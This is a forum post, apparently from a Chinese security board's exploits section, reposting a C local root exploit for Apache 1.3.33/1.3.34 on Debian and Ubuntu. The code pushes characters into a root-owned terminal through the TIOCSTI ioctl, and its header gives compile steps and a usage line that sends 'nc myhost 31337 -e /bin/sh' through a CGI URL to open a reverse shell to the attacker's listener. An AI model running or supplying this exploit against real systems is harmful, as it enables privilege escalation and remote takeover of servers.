Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit

pub!1c

魔

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员

帖子: 3925
精华: 128
积分: 209875
阅读权限: 200
性别: 男
在线时间: 1106 小时
注册时间: 2007-10-23
最后登录: 2008-8-20

资料收集奖运营支持奖

发短消息
加为好友
当前离线

楼主大中小发表于 2007-3-4 10:34 只看该作者

Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit

复制内容到剪贴板

代码:

/*

  :: Kristian Hermansen ::

  Date: 20070229

  Description: Local attacker can influence Apache to direct commands

   into an open tty owned by user who started apache process, usually root.

   This results in arbitrary command execution.

  Affects: Apache 1.3.33/1.3.34 on Debian Stable/Testing/Unstable/Experimental    and Ubuntu Warty (4.10)/Hoary (5.04)/Breezy (5.10)/Dapper (6.06)

   Edgy (6.10), Feisty (7.04).

  Notes: Must have CGI execution privileges and

   service started manually by root via shell.

   Also try adding "Options +ExecCGI" to your .htaccess file.

  Compile: gcc -o /path/to/cgi-bin/cgipwn cgipwn.c

  Usage: nc -vvv -l -p 31337

   [url]http://webserver/cgi-bin/cgipwn?nc%20myhost%2031337%20-e%20%2fbin%2f/sh%0d[/url]

  u53l355 gr33t5: yawn, jellyfish, phzero, pegasus, b9punk, phar, shardy,

   benkurtz, ... and who could forget ... setient (the gremlin)!!

*/



#include <fcntl.h>

#include <sys/ioctl.h>



int main(int argc, char *argv[]) {

  int pts = open("/dev/tty",O_RDONLY);

  while(*argv[1] != &#39;\0&#39;) {

   ioctl(pts,TIOCSTI,argv[1]);

   argv[1]++;

  }

  return 0;

}

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit